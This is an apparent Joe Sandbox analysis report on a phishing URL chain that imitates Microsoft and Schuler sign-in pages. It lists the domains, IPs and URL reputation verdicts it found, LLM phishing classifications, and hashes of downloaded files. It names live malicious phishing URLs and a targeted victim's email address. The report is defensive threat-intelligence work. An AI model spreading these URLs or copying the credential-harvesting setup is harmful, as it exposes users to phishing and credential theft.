        https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag100%Avira URL Cloudmalware
        https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        s3irk.ativens.com
        104.21.90.167
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            nzd92.6gniu68.ru
            188.114.96.3
            truefalse
              unknown
              github.com
              140.82.121.4
              truefalse
                unknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  unknown
                  itanhangasaude.com.br
                  162.241.62.33
                  truefalse
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalse
                      unknown
                      ipapi.co
                      104.26.9.44
                      truefalse
                        unknown
                        vkwek.ckyucle.com
                        188.114.96.3
                        truetrue
                          unknown
                          code.jquery.com
                          151.101.130.137
                          truefalse
                            unknown
                            d2vgu95hoyrpkh.cloudfront.net
                            18.245.31.78
                            truefalse
                              unknown
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                unknown
                                sni1gl.wpc.upsiloncdn.net
                                152.199.21.175
                                truefalse
                                  unknown
                                  challenges.cloudflare.com
                                  104.17.3.184
                                  truefalse
                                    unknown
                                    www.google.com
                                    142.250.186.164
                                    truefalse
                                      unknown
                                      d19d360lklgih4.cloudfront.net
                                      13.33.187.68
                                      truefalse
                                        unknown
                                        objects.githubusercontent.com
                                        185.199.109.133
                                        truefalse
                                          unknown
                                          httpbin.org
                                          3.227.135.8
                                          truefalse
                                            unknown
                                            cdn.socket.io
                                            unknown
                                            unknownfalse
                                              unknown
                                              aadcdn.msauthimages.net
                                              unknown
                                              unknownfalse
                                                unknown
                                                ok4static.oktacdn.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.itanhangasaude.com.br
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    206.23.85.13.in-addr.arpa
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmXfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4Wfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSFfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrstrue
                                                        unknown
                                                        https://vkwek.ckyucle.com/2DUx/true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3Dfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://s3irk.ativens.com/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://a.nel.cloudflare.com/report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3Dfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://vkwek.ckyucle.com/favicon.icotrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.google.com/recaptcha/api.jsfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ipapi.co/8.46.123.33/json/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITfalse
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://a.nel.cloudflare.com/report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3Dfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.jsfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://httpbin.org/ipfalse
                                                          • 1%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.comtrue
                                                            unknown
                                                            https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47true
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40true
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normaltrue
                                                              unknown
                                                              https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.comtrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://vkwek.ckyucle.com/xy12R7tzrssHzef25true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0agtrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://support.google.com/recaptcha#6262736chromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://support.google.com/recaptcha/?hl=en#6223828chromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cloud.google.com/contactchromecache_126.2.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/fent)chromecache_118.2.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://support.google.com/recaptcha/#6175971chromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.chromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.google.com/recaptcha/api2/chromecache_126.2.dr, chromecache_121.2.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://vkwek.ckyucle.com/2DUx/#-chromecache_123.2.drtrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://support.google.com/recaptchachromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_126.2.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://recaptcha.netchromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.apache.org/licenses/chromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://play.google.com/log?format=json&hasfast=truechromecache_126.2.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_126.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              18.245.31.78
                                                              d2vgu95hoyrpkh.cloudfront.netUnited States
                                                              16509AMAZON-02USfalse
                                                              151.101.130.137
                                                              code.jquery.comUnited States
                                                              54113FASTLYUSfalse
                                                              104.17.3.184
                                                              challenges.cloudflare.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              185.199.109.133
                                                              objects.githubusercontent.comNetherlands
                                                              54113FASTLYUSfalse
                                                              151.101.66.137
                                                              unknownUnited States
                                                              54113FASTLYUSfalse
                                                              35.190.80.1
                                                              a.nel.cloudflare.comUnited States
                                                              15169GOOGLEUSfalse
                                                              104.17.24.14
                                                              cdnjs.cloudflare.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              172.217.18.4
                                                              unknownUnited States
                                                              15169GOOGLEUSfalse
                                                              13.33.187.68
                                                              d19d360lklgih4.cloudfront.netUnited States
                                                              16509AMAZON-02USfalse
                                                              140.82.121.4
                                                              github.comUnited States
                                                              36459GITHUBUSfalse
                                                              104.26.9.44
                                                              ipapi.coUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              104.21.90.167
                                                              s3irk.ativens.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              3.227.135.8
                                                              httpbin.orgUnited States
                                                              14618AMAZON-AESUSfalse
                                                              239.255.255.250
                                                              unknownReserved
                                                              unknownunknownfalse
                                                              162.241.62.33
                                                              itanhangasaude.com.brUnited States
                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                              188.114.96.3
                                                              nzd92.6gniu68.ruEuropean Union
                                                              13335CLOUDFLARENETUStrue
                                                              142.250.186.164
                                                              www.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              152.199.21.175
                                                              sni1gl.wpc.upsiloncdn.netUnited States
                                                              15133EDGECASTUSfalse
                                                              104.17.2.184
                                                              unknownUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              IP
                                                              192.168.2.6
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1466693
                                                              Start date and time:2024-07-03 09:39:36 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 3m 22s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:browseurl.jbs
                                                              Sample URL:https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:8
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal80.phis.win@19/102@36/20
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 64.233.166.84, 142.250.185.174, 142.250.80.35, 34.104.35.123, 40.68.123.157, 192.229.221.95, 199.232.214.172, 20.166.126.56, 13.95.31.18, 93.184.221.240, 13.85.23.206, 40.127.169.103, 13.85.23.86, 172.217.18.106, 172.217.18.10, 172.217.23.106, 142.250.184.234, 172.217.16.138, 142.250.185.74, 216.58.212.138, 142.250.184.202, 216.58.206.74, 172.217.16.202, 142.250.186.170, 142.250.186.138, 142.250.181.234, 142.250.186.106, 142.250.74.202, 142.250.186.42, 216.58.212.131, 142.250.186.67, 199.232.210.172
                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              No simulations
                                                              InputOutput
                                                              URL: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs Model: Perplexity: mixtral-8x7b-instruct
                                                              {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                              Title: Fair Value OCR:  Microsoft Sign in crystal.begin@schulergrcup.com No ecccunt7 Create one: Can't access your account? Next Sign-in options Terms of use Privacy & cookies 
                                                              URL: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs Model: Perplexity: mixtral-8x7b-instruct
                                                              {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a form that requests sensitive information such as email addresses and passwords.","There is no language in the text that creates a sense of urgency.","There is no CAPTCHA or other anti-robot detection mechanism present on the webpage."]}
                                                              Title: Fair Value OCR: SCHULER crystal.begin@schulergroup.com Enter password Enter password to access your office mail. Password Forgot my password Sign in Terms of use Privacy & cookies 
                                                              URL: https://vkwek.ckyucle.com Model: gpt-4o
                                                              ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion."}
                                                              URL: https://vkwek.ckyucle.com Model: gpt-4o
                                                              ```json{  "phishing_score": 9,  "brands": "Schuler",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "schulergroup.com",  "reasons": "The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts."}
                                                              No context
                                                              No context
                                                              No context
                                                              No context
                                                              No context
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):231
                                                              Entropy (8bit):6.725074433303473
                                                              Encrypted:false
                                                              SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                              MD5:547988BAC5584B4608466D761E16F370
                                                              SHA1:C11BB71049702528402A31027F200184910A7E23
                                                              SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                              SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130
                                                              Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (51734)
                                                              Category:downloaded
                                                              Size (bytes):222931
                                                              Entropy (8bit):5.0213311632628725
                                                              Encrypted:false
                                                              SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                              MD5:0329C939FCA7C78756B94FBCD95E322B
                                                              SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                              SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                              SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                              Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                              Category:downloaded
                                                              Size (bytes):43596
                                                              Entropy (8bit):7.9952701440723475
                                                              Encrypted:true
                                                              SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                              MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                              SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                              SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                              SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72
                                                              Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:V:V
                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:0
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):10796
                                                              Entropy (8bit):7.946024875001343
                                                              Encrypted:false
                                                              SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                              Malicious:false
                                                              Reputation:low
